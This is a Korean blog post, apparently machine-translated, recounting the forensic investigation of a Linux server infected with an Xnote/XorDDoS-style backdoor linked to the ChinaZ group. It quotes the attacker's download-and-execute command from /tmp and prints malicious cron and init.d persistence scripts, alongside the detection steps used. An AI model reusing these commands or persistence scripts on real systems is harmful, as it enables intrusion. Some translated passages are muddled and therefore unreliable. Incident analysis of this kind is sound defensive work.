서버의 공격

6916 단어 DevOps
서버가 다운되어 ssh를 연결할 수 없습니다. 방법이 없습니다. 기계실에 가보니 서버가 마지막으로 실행된 몇 가지 명령을 계속 켜고 있습니다.
#  root 
history > history.log

#  
curl ****/  /tmp/hei
chmod 744 hei
./hei

여기에 몇 가지 문제가 있습니다.
  • 다운로드hei 파일의 ip 주소를 보았습니다. 강소성에 있는 것이지만 저희 서버는 내부에서 사용되고 외부 네트워크에 접근할 수 없습니다
  • 정상적인 사용자라면 hei 파일이 /tmp 폴더에 다운로드되는 이유
  • history의 역사를 저장한 후에 서버를 리셋했지만 핑이 다르고 카드를 리셋했습니다.
    #  
    service network restart
    

    모든 것이 막 시작되었다.


    메일부터.


    이대로 끝날 줄 알았는데...어느 날 나는 루트 사용자가 항상 한 통의 메일을 받는데 대략 200통이 넘는다는 것을 발견했다. 내용은 같고 나는 수동으로 그것들을 삭제했다.
    그러나 얼마 후, 나는 또 여러 통의 같은 우편물을 받았다.
    메일을 자세히 보고 알겠습니다. 아래의 명령이 실행에 실패했습니다!
    #  
    mail
    
    #  
    & more  
    
    cp /lib/udev/udev /lib/udev/debug
    /lib/udev/debug
    

    /etc/cron.hourly


    이 디렉터리에서 이cron을 발견했습니다.sh 파일
    cd /etc/cron.hourly
    
    #  
    stat cron.sh
    
    etc/cron.hourly/cron.sh 파일 내용
    #!/bin/sh
    PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
    for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`;do ifconfig $i up& done
    cp /lib/udev/udev /lib/udev/debug
    /lib/udev/debug
    

    for 순환이라는 명령은 모든 네트워크 카드를 다시 시작하는 것이 분명하다.
    이 파일이 존재하지 않습니다.그래서cp라는 명령은 항상 실패하고 로그 시스템이 작용하기 때문에 시간마다 루트 계정에 메일을 보냅니다.
    이 파일을 삭제한 후에 과연 다시 메일을 보내지 않았다

    난 또 끝난 줄 알았어.


    /lib/udev/udev 이 파일이 사라졌는지 모르겠습니다. /lib/udev/udev 명령을 실행하고 시스템을 업데이트해서 이 파일이 없어졌기 때문입니까?원인을 나는 전혀 모른다.
    그러나, 어쨌든, 더 이상 메일을 보내지 않았습니다...

    운명의 만남, 이것이 하늘의 뜻입니까


    네트워크 명령부터


    시간이 좀 지나서 인터넷 명령을 좀 배우고 싶어요.yum update 명령을 사용할 때, 나는 갑자기 매우 이상한 IP 주소를 발견했다.
    ss -p
    
    #  * 
    SYN-SENT 0 1 *.*.*.*:50533  61.160.211.197:uaac users:(("654",21110,5))
    

    여러 번 실행될 때ss 이 포트가 끊임없이 바뀔 것50533 여러 가지 징후가 당신의 서버가 연결을 시도하고 있음을 나타낸다SYN-SENT

    where are you

    #  ip pid
    netstat -p | less
    
    #  , 
    ps -aux | grep pid
    #  
    ps -ef | grep pid
    
    #  
    kill -9 pid
    

    그러나 프로세스는 죽일 수 없었고, 몇 분 후에 다시 시작되었다

    /etc/init.d


    이 디렉터리를 검사하려면 파일을 숨겨야 합니다. 위의stat의 명령과 시스템이 다운되는 시간에 따라 시스템이 03월 21일에 공격을 받았음을 기본적으로 확인할 수 있습니다.
    #  3/21 
    touch -t 201603210000.00 TT
    find . -newer TT
    
    #  ls, 
    ls -al
    

    다음과 같은 의문의 파일 61.160.211.197:uaac 이 발견되었습니다.
    #!/bin/sh
    # chkconfig: 12345 90 90
    # description: .chinaz{1458543822
    ### BEGIN INIT INFO
    # Provides:             .chinaz{1458543822
    # Required-Start:
    # Required-Stop:
    # Default-Start:        1 2 3 4 5
    # Default-Stop:
    # Short-Description:    .chinaz{1458543822
    ### END INIT INFO
    case $1 in
    start)
            /tmp/.chinaz{1458543822
            ;;
    stop)
            ;;
    *)
            /tmp/.chinaz{1458543822
            ;;
    esac
    

    이 서비스는 .chinaz\{1458543822할 수 없고 서비스의 스크립트는 stop에 있습니다. 제가 발견했을 때 이 스크립트는 이미 없습니다.하지만 전원을 켤 때 자동으로 생성될 것이다.그러나 우리는 여전히 얻은 것이 있다. 이것은 자동 시작 스크립트이다. 운행 단계 12345, 운행 번호 90
    가장 중요한 것은: 우리는 의미 있는 이름을 얻었다/tmp. 그것은 자신의 진짜 이름을 폭로했다!!!
    아주 오래된 마법 시대에, 어떤 신중한 무당도 자신의 진명 실성을 가장 소중히 여길 만한 밀장으로 간주하였으며, 동시에 자신의 생명에 대한 가장 큰 위협이기도 했다.

    나타나라


    발췌하다http://news.drweb.com/show/?i=9272&lng=en&c=5 To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. 이 페이지는 이 바이러스를 소개했는데 리눅스입니다.BackDoor.Xnote.1의 변종.
    Linux.BackDoor.Xnote.일:http://vms.drweb.com/virus/?_is=1&i=4323517

    새로운 의혹, 모든 것이 아직 끝나지 않았다...


    이것이 너의 진짜 이름이냐!


    내장형 Rookit을 숨긴 DDoS 목마 분석http://www.freebuf.com/articles/system/58836.html
    XorDDos 패밀리:http://www.aptno1.com/YC/102.html
    https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html
    Linux에서 무작위 10자 바이러스 제거http://blog.chinaunix.net/uid-20332519-id-4941140.html

    좋은 웹페이지 즐겨찾기